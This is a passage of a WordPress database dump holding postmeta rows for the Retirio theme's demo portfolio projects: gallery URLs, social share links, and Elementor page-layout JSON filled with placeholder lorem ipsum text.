gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(978,629,'_elementor_page_assets','a:0:{}'),(979,629,'_thumbnail_id','1156'),(981,634,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(982,634,'ova_project_service','Interior design'),(983,634,'ova_project_architect','Mike hardson'),(984,634,'ova_project_duration','4.5 Months'),(985,634,'ova_project_location','Broklyn, New York'),(986,634,'_elementor_edit_mode','builder'),(987,634,'_elementor_template_type','wp-post'),(988,634,'_elementor_version','3.6.6'),(989,634,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:86:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:93:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:101:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:87:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/idea-interior/\";}}'),(990,634,'_wp_page_template','default'),(991,634,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Idea interior\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(992,634,'_elementor_page_assets','a:0:{}'),(993,634,'_thumbnail_id','1158'),(995,639,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(996,639,'ova_project_service','Interior design'),(997,639,'ova_project_architect','Mike hardson'),(998,639,'ova_project_duration','4.5 Months'),(999,639,'ova_project_location','Broklyn, New York'),(1000,639,'_elementor_edit_mode','builder'),(1001,639,'_elementor_template_type','wp-post'),(1002,639,'_elementor_version','3.6.6'),(1003,639,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:82:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/buildings/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:89:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/buildings/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:97:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/buildings/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:83:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/buildings/\";}}'),(1004,639,'_wp_page_template','default'),(1005,639,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Buildings\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1006,639,'_elementor_page_assets','a:0:{}'),(1007,639,'_thumbnail_id','1159'),(1009,657,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1010,657,'ova_project_service','Interior design'),(1011,657,'ova_project_architect','Mike hardson'),(1012,657,'ova_project_duration','4.5 Months'),(1013,657,'ova_project_location','Broklyn, New York'),(1014,657,'_elementor_edit_mode','builder'),(1015,657,'_elementor_template_type','wp-post'),(1016,657,'_elementor_version','3.6.6'),(1017,657,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:81:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/domestic/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:88:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/domestic/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:96:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/domestic/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:82:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/domestic/\";}}'),(1018,657,'_wp_page_template','default'),(1019,657,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Domestic\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque 